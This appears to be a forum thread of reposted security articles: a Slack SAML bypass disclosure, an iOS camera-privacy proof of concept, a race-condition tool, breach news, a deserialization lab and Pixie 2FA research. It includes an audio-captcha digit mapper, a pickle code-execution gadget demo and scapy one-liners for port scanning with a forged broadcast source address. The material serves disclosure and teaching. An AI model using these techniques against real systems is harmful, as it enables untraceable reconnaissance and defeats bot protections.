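    "too": "2", "three": "3", "four": "4", "for": "4", "five": "5",
    "six": "6", "seven": "7", "eight": "8", "ate": "8", "nine": "9",
}

def to_digits(transcription):
    """Map a raw transcription to the digit string a captcha expects."""
    out = []
    for word in transcription.lower().split():
        if word.isdigit():
            out.append(word)          # engine already returned a digit
        elif word in HOMOPHONES:
            out.append(HOMOPHONES[word])
        # anything else is noise and is dropped
    return "".join(out)

print(to_digits("won 2 three for"))  # 1234
```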
-
Slack SAML authentication bypass
October 26, 2017
tl;dr I found a severe issue in Slack's SAML implementation that allowed me to bypass authentication. This has now been fixed by Slack.
Introduction
IMHO rule #1 of any bug hunter (note I do not consider myself one of them, since I do this really sporadically) is to have a good RSS feed list. Over the last few years I built a pretty decent one, and I try to follow other security experts in order to "steal" some useful tricks. There are many experts in different fields of the security panorama, too many to quote here (maybe another post). But one of the leading experts on SAML that I follow is by far Ioannis Kakavas. Indeed, in recent years he was able to find serious vulnerabilities in the SAML implementations of Microsoft and Github. Usually I am more of an "OAuth guy", but since both SAML and OAuth are nothing but grandchildren of Kerberos, learning SAML has been on my todo list for a long time. The Github incident gave me the final motivation to start learning it.
Learning SAML
As I said, I was a kind of SAML idiot until the beginning of 2017, but then I decided to learn it a little bit. Of course I started by giving a look at the specification, but the best way I learn things is by doing and, hopefully, breaking. So I downloaded the great Burp extension SAML Raider (great stuff, it saves so much time; you can edit any assertion on the fly). Then I checked whether any of the services I routinely use are SAML compliant. It turns out that many of them are. To name some: Github (but I guess Ioannis already took all the bugs there). So Ping next (I actually found this funny JS Github bug while looking into it, but it's not pertinent here). Hackerone: I gave it a try but nada, nisba, niente, nicht, niet. Slack: bingo, see next section (this is probably meant for Enterprise customers).
Slack SAML authentication bypass
As I said, many of the services I use routinely are SAML aware, so I started to poke at them a bit. The vulnerability I found belongs to the class known as the "confused deputy problem". I already talked about it in one of my OAuth blog posts (tl;dr this is also why you never want to use the OAuth implicit grant flow as an authentication mechanism), and it is really simple. Basically, SAML assertions contain, among other things, elements called Audience and AudienceRestriction. Quoting Ioannis: The Assertion also contains an AudienceRestriction element that defines that this Assertion is targeted for a specific Service Provider and cannot be used for any other Service Provider. This means that if I present to Service Provider A an assertion meant for Service Provider B, then Service Provider A should reject it. Well, among all the other things, I tried this really simple attack against Slack's SAML endpoint /sso/saml and guess what? It worked!! To be more concrete, I used an old and expired (yes, the assertion was also expired!!) Github assertion I had saved somewhere in my archive, signed for a subject different from mine (namely, the username was not asanso aka me), and presented it to Slack. Slack happily accepted it and I was logged into the Slack channel with the username from this old and expired assertion that was never meant to be a Slack one!!! Wow, this is scary.... Well, this looked bad enough, so I stopped almost immediately and opened a ticket on Hackerone....
Disclosure timeline
...here the Slack security team was simply amazing... Thanks guys
02-05-2017 - Reported the issue via Hackerone.
03-05-2017 - Slack confirmed the issue.
26-08-2017 - Slack awarded a $3,000 bounty, but was still working with the affected customers to solve the vulnerability, hence the ticket was kept open.
26-10-2017 - Slack closed the issue.
Acknowledgement
I would like to thank the Slack security team, in particular Max Feldman; you guys rock, really!! Well, that's all folks. For more SAML trickery follow me on Twitter.
Sursa: http://blog.intothesymmetry.com/2017/10/slack-saml-authentication-bypass.html
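For readers wondering what the missing check looks like in practice: alongside signature and expiry validation, a Service Provider has to verify that its own entity ID appears in the assertion's AudienceRestriction. A minimal sketch of just that check; this is not Slack's code, the namespace is the SAML 2.0 assertion namespace, and the example URLs are invented:

```python
import xml.etree.ElementTree as ET

NS = {"saml": "urn:oasis:names:tc:SAML:2.0:assertion"}

def audience_ok(assertion_xml, expected_audience):
    """Reject any assertion whose AudienceRestriction does not name us."""
    root = ET.fromstring(assertion_xml)
    audiences = [
        a.text
        for a in root.findall(".//saml:AudienceRestriction/saml:Audience", NS)
    ]
    # Missing or mismatched audience -> the assertion was minted for a
    # different Service Provider and must not be accepted.
    return expected_audience in audiences

github_assertion = """
<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
  <saml:Conditions>
    <saml:AudienceRestriction>
      <saml:Audience>https://github.com/orgs/example</saml:Audience>
    </saml:AudienceRestriction>
  </saml:Conditions>
</saml:Assertion>
"""

# An assertion minted for Github must be rejected by Slack's endpoint.
print(audience_ok(github_assertion, "https://slack.example.com/sso/saml"))  # False
```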
-
iOS Privacy: watch.user - Access both iPhone cameras any time your app is running
Oct 25, 2017 | Fork on GitHub
Facts
Once you grant an app access to your camera, it can:
- access both the front and the back camera
- record you at any time the app is in the foreground
- take pictures and videos without telling you
- upload the pictures/videos it takes immediately
- run real-time face recognition to detect facial features or expressions
Have you ever used a social media app while using the bathroom? 🚽
All without indicating that your phone is recording you and your surroundings: no LEDs, no light, or any other kind of indication.
Disclaimer
This project is a proof of concept and should not be used in production. The goal is to highlight a privacy loophole that can be abused by iOS apps.
What can an iOS app do?
iOS users often grant camera access to an app soon after they download it (e.g., to add an avatar or send a photo). These apps, like a messaging app or any news-feed-based app, can easily track the user's face, take pictures, or live stream the front and back camera, without the user's consent:
- Get full access to the front and back camera of an iPhone/iPad any time your app is running in the foreground
- Use the front and the back camera to know what your user is doing right now and where the user is located based on image data
- Upload random frames of the video stream to your web service and run proper face recognition software, which enables you to find existing photos of the person on the internet, learn what the user looks like, and create a 3D model of the user's face
- Live stream their camera onto the internet (e.g. while they sit on the toilet); with the recent innovations around faster internet connections, faster processors, and more efficient video codecs, it's hard to detect for the average user
- Estimate the mood of the user based on what you show in your app (e.g. the news feed of your app)
- Detect if the user is on their phone alone, or watching together with a second person
- Record stunning video material from bathrooms around the world, using both the front and the back camera, while the user scrolls through a social feed or plays a game
- Using the new built-in iOS 11 Vision framework, every developer can very easily parse facial features in real time, like the eyes, mouth, and the face frame
How can I protect myself as a user?
There are only a few things you can do:
- The only really safe way to protect yourself is to use camera covers: there are many different covers available; find one that looks nice to you, or use a sticky note (for example).
- You can revoke camera access for all apps, always use the built-in camera app, and use the image picker of each app to select the photo (which will cause you to run into a problem I described with detect.location). To avoid this as well, the best way is to use copy & paste to paste the screenshot into your messaging application. If an app has no copy & paste support, you'll have to expose either your image library or your camera.
It's interesting that many people cover their camera, including Mark Zuckerberg.
Proposal
How can the root of the problem be fixed, so we don't have to use camera covers?
- Offer a way to grant temporary access to the camera (e.g. to take and share one picture with a friend on a messaging app), related to detect.location.
- Show an icon in the status bar that the camera is active, and force the status bar to be visible whenever an app accesses the camera.
- Add an LED to the iPhone's camera (both sides) that can't be worked around by sandboxed apps, which is the elegant solution that the MacBook uses.
I reported the issue to Apple with rdar://35116272.
About the demo
I didn't submit the demo to the App Store; however, you can very easily clone the repo and run it on your own device:
- You first have to take a picture that gets "posted" on the fake "social network" in the app
- At this point, you've granted full access to both of your cameras every time the app is running
- You browse through a news feed
- After a bit of scrolling, you'll suddenly see pictures of yourself, taken a few seconds ago while you scrolled through the feed
- You realize you've been recorded the whole time, and along the way the app ran a face recognition algorithm to detect facial features
You might say "Oh, obviously, I never grant camera permissions!" However, if you're using a messaging service, like Messenger, WhatsApp, Telegram or anything else, chances are high you already granted permission to access both your image library (see detect.location) and your camera. You can check which apps have access to your cameras and photo library by going to Settings > Privacy. The full source code is available on GitHub.
How does the demo app get access to the camera?
Once you take and post one picture or video via a social network app, you grant full access to the camera, and any time the app is running, the app can use the camera.
What's the screenshot on the right?
As part of iOS 11, there is now an easy-to-use Vision framework that allows developers to easily track faces. The screenshot shows that it's possible to get some basic emotions right, so I wrote a very basic mapping of a user's face to the corresponding emoji as a proof of concept. You can see the highlighted facial features and the detected emoji at the bottom.
Similar projects I've worked on:
- what's the user doing: Raising awareness of what you can do with a smartphone's gyro sensors in web browsers
- detect.location: An easy way to access the user's iOS location data without actually having access
- steal.password: Easily get the user's Apple ID password, just by asking
Special thanks to Soroush, who came up with the initial idea for this write-up.
Open on GitHub
This project is in no way affiliated with my work and employer; it's a hobby of mine I work on during weekends.
Sursa: https://krausefx.com/blog/ios-privacy-watchuser-access-both-iphone-cameras-any-time-your-app-is-running
-
Race The Web (RTW)
Tests for race conditions in web applications by sending out a user-specified number of requests to a target URL (or URLs) simultaneously, and then compares the responses from the server for uniqueness. Includes a number of configuration options.
UPDATE: Now CI Compatible! Version 2.0.0 now makes it easier than ever to integrate RTW into your continuous integration pipeline (à la Jenkins, Travis, or Drone), through the use of an easy-to-use HTTP API. More information can be found in the Usage section below.
Watch The Talk
Racing the Web - Hackfest 2016
Usage
With configuration file:
$ race-the-web config.toml
API:
$ race-the-web
Sursa: https://github.com/insp3ctre/race-the-web
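The race conditions RTW hunts for follow a check-then-act pattern on the server. A self-contained simulation of that bug class; this is not RTW's code, and it uses threads against an in-process handler in place of real HTTP requests:

```python
# Simulated vulnerable handler: it checks state, then updates it, with no
# locking. Concurrent "requests" can all pass the check before any of them
# records the redemption (a classic time-of-check/time-of-use race).
import threading
import time

redeemed = set()
responses = []

def redeem(coupon):
    if coupon not in redeemed:        # check ...
        time.sleep(0.01)              # stand-in for a slow database round-trip
        redeemed.add(coupon)          # ... then act
        responses.append("applied")
    else:
        responses.append("rejected")

threads = [threading.Thread(target=redeem, args=("SAVE10",)) for _ in range(20)]
for t in threads:
    t.start()
for t in threads:
    t.join()

# A correct handler would report "applied" exactly once.
print(responses.count("applied"))
```

This is exactly the uniqueness comparison RTW automates over HTTP: fire N identical requests at once and see whether the responses differ from what a single request would produce.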
-
Hacker Wants $50K From Hacker Forum or He'll Share Stolen Database With the Feds By Catalin Cimpanu October 26, 2017 Extortion can also be funny when it happens to the bad guys, and there's one extortion attempt going on right now that will put a big smile on your face. The victim is Basetools.ws, an underground hacking forum that allows users to trade stolen credit card information, profile data, and spamming tools. The site boasts over 150,000 users and over 20,000 tools listed in its forums. Earlier this week, on Tuesday, an anonymous user appears to have breached the site and uploaded samples of its database online, along with a ransom demand. The attacker is asking for $50,000, or he'll share data on the site's administrator with US authorities, such as the FBI, DHS, DOJ, and the DOT (Department of Treasury). To prove the validity of his claims, the hacker shared an image of the Basetools admin panel and an image containing the site admin's login details and IP address. In addition, the hacker also dumped tools that Basetools users were selling on the site, such as login credentials for cPanel accounts; login credentials for shells, backdoors, and spambots hosted on hacked sites; credentials for RDP servers; server SSH credentials; user data leaked from various breaches at legitimate sites; and many more. As soon as the ransom demand and accompanying data were published online, the Basetools portal went offline and entered maintenance mode. "Yeah, the fact that site is down right now certainly doesn't look good for them," security researcher Dylan Katz told Bleeping Computer today regarding the possibility of the ransom demand being a fake breach. Nonetheless, "50k is a pretty steep ransom, seeing as the damage has already been done," Katz added. But financial gain is not the only motivation behind this hack. According to other text included in the ransom demand, the hacker also appears to have carried out the hack out of revenge, claiming the site's operator has been manipulating stats. "Basetools.pw is manipulating EARNING STATS & RESELLER STATS, Owner of this market has opened a reseller with name RedHat which always stays in First Place," the text reads. Lots of sensitive data leaked online Despite the "small potatoes" feel you get when reading about a breach at a hackers' forum, this security incident is quite notable. All the Basetools seller data that was supposedly being sold on the forums before the hack is now online and easily accessible to anyone. This means that credentials for thousands of servers are now within easy reach of anyone who knows where to look. Other hackers could take over these servers and deploy them in spam, malware hosting, or other malicious campaigns. The owners of these services will need to be notified so they can change credentials and clean up affected systems. Furthermore, Katz has also identified user data that appears to come from services that have not previously announced they suffered a data breach. These services will also need to be notified so they can investigate any potential breaches and reset passwords for affected accounts. Katz is currently processing the leaked data and intends to reach out to some of the affected parties. Sursa: https://www.bleepingcomputer.com/news/security/hacker-wants-50k-from-hacker-forum-or-hell-share-stolen-database-with-the-feds/
-
Lab for Java Deserialization Vulnerabilities
This content is related to the paper written for the 12th edition of H2HC magazine. See the full paper at: https://www.h2hc.com.br/revista/
Slides and video of the talk will be available soon.
An overview of deserialization vulnerabilities in the Java Virtual Machine (JVM)
Content
The lab contains code samples that help you understand deserialization vulnerabilities and how gadget chains exploit them. The goal is to provide a better understanding so that you can develop new payloads and/or better design your environments. There is also a vulnerable testing application (VulnerableHTTPServer.java), which helps you test your payloads.
Sursa: https://github.com/joaomatosf/JavaDeserH2HC
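Although the lab targets Java, the underlying problem translates almost verbatim to Python's pickle, which can make the concept quicker to grasp. A deliberately harmless sketch (my own analogy, not part of the lab): with native serialization formats, the byte stream itself decides which code runs during deserialization.

```python
# Python miniature of the Java problem the lab demonstrates: with native
# serialization (Java ObjectInputStream, Python pickle), deserializing
# attacker-controlled bytes runs attacker-chosen code.
import pickle

hits = []

def record(msg):
    """Stand-in for an attacker-chosen call (the role a Java gadget plays)."""
    hits.append(msg)
    return msg

class Gadget:
    # __reduce__ is pickle's "how to rebuild me" hook; the serialized
    # stream controls it the way gadget chains steer readObject in Java.
    def __reduce__(self):
        return (record, ("code ran during deserialization",))

payload = pickle.dumps(Gadget())
pickle.loads(payload)  # record() runs before application code sees anything
print(hits)  # ['code ran during deserialization']
```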
-
Port scanning without an IP address
Posted: October 26, 2017 in midnight thoughts, security
Re-evaluating how some actions are performed can sometimes lead to new insights, which is exactly the reason for this blog post. Be aware that I've only tested this on two "test" networks, so I cannot guarantee this will always work. Worst case, you'll read a (hopefully) out-of-the-box blog entry about an alternative port scan method that maybe only works in weird corner cases. The source for the script can be found on my gist, if you prefer to skip my ramblings and jump directly to the source. One of the things I usually do is sniff traffic on the network that I am connected to with either my laptop or a drop device. At that point the output of the ifconfig command usually looks similar to this:
eth0 Link encap:Ethernet HWaddr 00:0c:29:4b:e7:35 inet6 addr: fe80::20c:29ff:fe4b:e735/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:386316 errors:0 dropped:0 overruns:0 frame:0 TX packets:25286 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:390745367 (390.7 MB) TX bytes:4178071 (4.1 MB)
As you will notice, the interface has no IPv4 address assigned; you can ignore the IPv6 address for now. Normally I determine which IP address or MAC address to clone based on the traffic that I captured and analysed previously. Then I'm all set to start port scanning or performing other types of attacks. This time, however, I wondered what type of activities I could perform without an IP address. I mean, it would be pretty interesting to talk IP to devices, somehow see a response, and not be traceable, right? So I decided to see if it would, for example, be possible to perform a port scan on the network without having an IP address configured on my network interface. Since usually when you want to perform non-standard, weird or nifty tricks with TCP/IP you have to resort to raw sockets, I decided to jump directly to scapy to build a POC.
My working theory was as follows: normally, when I am just sniffing traffic, I see all kinds of traffic that gets sent to the broadcast address. So what if we perform a port scan and specify the broadcast address as the source? I decided to test this using two virtual machines (Ubuntu & Windows 10) with the network settings on "NAT", and also tested with the same virtual machines bridged to a physical network. The following one-liners can be used to transmit the raw packet:
pkt = Ether(dst='00:0c:29:f6:a5:65',src='00:08:19:2c:e0:15') / IP(dst='172.16.218.178',src='172.16.218.255') / TCP(dport=445,flags='S')
sendp(pkt,iface='eth0')
Running tcpdump will confirm whether this works or not. Moment of truth:
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
23:27:21.903583 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto TCP (6), length 40) 172.16.218.255.20 > 172.16.218.178.445: Flags [S], cksum 0x803e (correct), seq 0, win 8192, length 0
23:27:21.904440 IP (tos 0x0, ttl 128, id 31823, offset 0, flags [DF], proto TCP (6), length 44) 172.16.218.178.445 > 172.16.218.255.20: Flags [S.], cksum 0x03be (correct), seq 3699222724, ack 1, win 65392, options [mss 1460], length 0
23:27:24.910050 IP (tos 0x0, ttl 128, id 31824, offset 0, flags [DF], proto TCP (6), length 44) 172.16.218.178.445 > 172.16.218.255.20: Flags [S.], cksum 0x03be (correct), seq 3699222724, ack 1, win 65392, options [mss 1460], length 0
23:27:30.911092 IP (tos 0x0, ttl 128, id 31825, offset 0, flags [DF], proto TCP (6), length 44) 172.16.218.178.445 > 172.16.218.255.20: Flags [S.], cksum 0x03be (correct), seq 3699222724, ack 1, win 65392, options [mss 1460], length 0
23:27:42.911498 IP (tos 0x0, ttl 128, id 31829, offset 0, flags [DF], proto TCP (6), length 40) 172.16.218.178.445 > 172.16.218.255.20: Flags [R], cksum 0x1af8 (correct), seq 3699222725, win 0, length 0
wOOOOOOOt!! It seems to work.
We can clearly see the packet being sent to the ".178" IP address from the broadcast (.255) source address, and then the response flowing back to the broadcast address. Now that's pretty interesting, right? Essentially we can now perform port scans without being really traceable on the network. Somehow this still feels "weirdish", because it just works on the first try... so I'm still thinking I missed something :/
sudo ./ipless-scan.py 172.16.218.178 00:0c:29:f6:a5:65 -p 445 3389 5000 -i eth0
2017-10-26 23:13:33,559 - INFO - Started ipless port scan
2017-10-26 23:13:33,559 - INFO - Started sniffer and waiting 10s
2017-10-26 23:13:43,568 - INFO - Starting port scan
2017-10-26 23:13:43,604 - INFO - Found open port - 445
2017-10-26 23:13:43,628 - INFO - Found open port - 3389
2017-10-26 23:13:43,645 - INFO - Found closed port - 5000
2017-10-26 23:13:43,654 - INFO - Finished port scan, waiting 5s for packets
2017-10-26 23:13:52,626 - INFO - Stopped sniffer
Sursa: https://diablohorn.com/2017/10/26/port-scanning-without-an-ip-address/
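For completeness, the classification step behind output like the above is the standard SYN-scan rule: a SYN/ACK reply means open, a RST means closed, silence means filtered. Sketched here without scapy so the logic stands alone; the flag bit values are the ones from the TCP header:

```python
# Decide port state from the TCP flags of the reply that came back to the
# broadcast address -- the same mapping every SYN scanner uses.
SYN, RST, ACK = 0x02, 0x04, 0x10

def port_state(tcp_flags):
    """Classify a SYN probe's reply; None means no reply was sniffed."""
    if tcp_flags is None:
        return "filtered"
    if tcp_flags & SYN and tcp_flags & ACK:
        return "open"      # the 'Flags [S.]' replies in the capture above
    if tcp_flags & RST:
        return "closed"
    return "unknown"

print(port_state(SYN | ACK))  # open
print(port_state(RST | ACK))  # closed
print(port_state(None))       # filtered
```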
-
Dovlecel, are you alive? PS: I haven't found a suitable share to test on...
-
Whoo, simple and nice, worth a try.
-
Things are already moving: https://www.darkreading.com/attacks-breaches/new-tool-debuts-for-hacking-back-at-hackers-in-your-network/d/d-id/1330121
-
Camera-based, single-step two-factor authentication resilient to pictionary, shoulder surfing attacks
A group of researchers from Florida International University and Bloomberg LP have created Pixie, a camera-based two-factor authentication system that could end up being a good alternative to passwords and biometrics-based 2FA options.
About Pixie
"Pixie authentication is based on what the user has (the trinket) and what the user knows (the particular trinket among all the other objects that the user readily has access to, angle and viewpoint used to register the trinket)," the researchers explained. "Pixie assigns the duty of storing the token for the second factor to a physical object outside the mobile device." It combines the user's secret and the second authentication factor, and the authentication is performed in a single step: by snapping a photo of the trinket. The trinket can be any item worn or carried every day by the user: a watch, shoes, jewelry, shirt patterns, credit cards, logos, a tattoo, and so on. The user doesn't have to use the whole item as the trinket, just a portion of it (e.g. a section of their shoes, a shirt pattern). "In contrast to biometrics, Pixie enables users to change the authenticating physical factor, as they change accessories they wear or carry. This reduces the risks from an adversary who has acquired the authentication secret from having lifelong consequences for the victims, thereby mitigating the need for biometric traceability and revocation," the researchers noted.
Testing the solution
The researchers performed a user study to see whether users would find this solution usable and helpful. Granted, the number of participants was small (42), but it showed that users had less trouble memorizing their trinket than their passwords, and half of them preferred it to passwords. As far as authentication speed, accuracy and resilience to attack are concerned, Pixie definitely looks promising. They implemented Pixie for Android on an HTC One smartphone and found it processes a login attempt in half a second. The solution also achieves a False Accept Rate of 0.02% and a False Reject Rate of 4.25%, when evaluated over 122,500 authentication instances. "To evaluate the security of Pixie, we introduce several image based attacks, including an image based dictionary (or 'pictionary') attack. Pixie achieves a FAR below 0.09% on such an attack consisting of 14.3 million authentication attempts constructed using public trinket image datasets and images that we collected online," they shared. "Similar to face based authentication, Pixie is vulnerable to attacks where the adversary captures a picture of the trinket. However, we show that Pixie is resilient to a shoulder surfing attack flavor where the adversary knows or guesses the victim's trinket object type. Specifically, on a targeted attack dataset of 7,853 images, the average number of 'trials until success' exceeds 5,500 irrespective of whether the adversary knows the trinket type or not." They've also developed features that enable the solution to reduce the effectiveness of a "master image" attack.
Potential use
Pixie can be used both as a standalone authentication solution and as a secondary one. According to the researchers, it could be ideal for a scenario of remote service authentication through a mobile device, but could also be used for authentication in camera-equipped cyber-physical systems. "For instance, cars can use Pixie to authenticate their drivers locally and to remote services. Pixie can also authenticate users to remote, smart house or child monitoring systems, through their wearable devices. Further, door locks, PIN pads and fingerprint readers can be replaced with a camera through which users snap a photo of their trinket to authenticate," they noted. "Pixie can be used as an alternative to face based authentication when the users are reluctant to provide their biometric information (e.g. in home game systems where the user needs to authenticate to pick a profile before playing or to unlock certain functionalities). Pixie can also be used as an automatic access control checkpoint (e.g. for accessing privileged parts of a building). The users can print a visual token and use it to pass Pixie access control checkpoints." There are, of course, authentication scenarios where Pixie would not be a good option, such as authentication in poor light conditions, or where there is a high risk of external observers. The researchers have published Pixie (open source) code on GitHub, and an Android app on Google Play.
Sursa: https://www.helpnetsecurity.com/2017/10/24/single-step-two-factor-authentication/
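To make the matching idea concrete: Pixie's actual pipeline is more sophisticated, but the shape of camera-based matching can be sketched with a toy average hash over a tiny grayscale grid. Reduce the trinket photo to a small fingerprint, then authenticate on Hamming distance instead of exact pixel equality (this is a generic illustration, not Pixie's algorithm; the pixel values are invented):

```python
# Toy average-hash matcher: turn an "image" into a bit fingerprint, then
# accept a login attempt when its fingerprint is close to the enrolled one.

def average_hash(pixels):
    """pixels: 2D list of grayscale values (a stand-in for a small image)."""
    flat = [p for row in pixels for p in row]
    mean = sum(flat) / len(flat)
    return [1 if p > mean else 0 for p in flat]  # brighter than average -> 1

def hamming(a, b):
    """Number of fingerprint bits that differ."""
    return sum(x != y for x, y in zip(a, b))

enrolled = average_hash([[200, 200, 10], [10, 200, 10], [10, 10, 10]])
# Same trinket, new photo: values shift slightly but the pattern survives.
attempt = average_hash([[190, 210, 20], [15, 205, 5], [5, 20, 15]])
# A different object produces a very different pattern.
other = average_hash([[10, 10, 200], [200, 10, 200], [200, 200, 200]])

print(hamming(enrolled, attempt))  # small distance -> accept
print(hamming(enrolled, other))    # large distance -> reject
```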
-
Just a suggestion: maybe it would be better if the list of talks, grouped by day, were in tabs: "Day 1" and "Day 2". @Andrei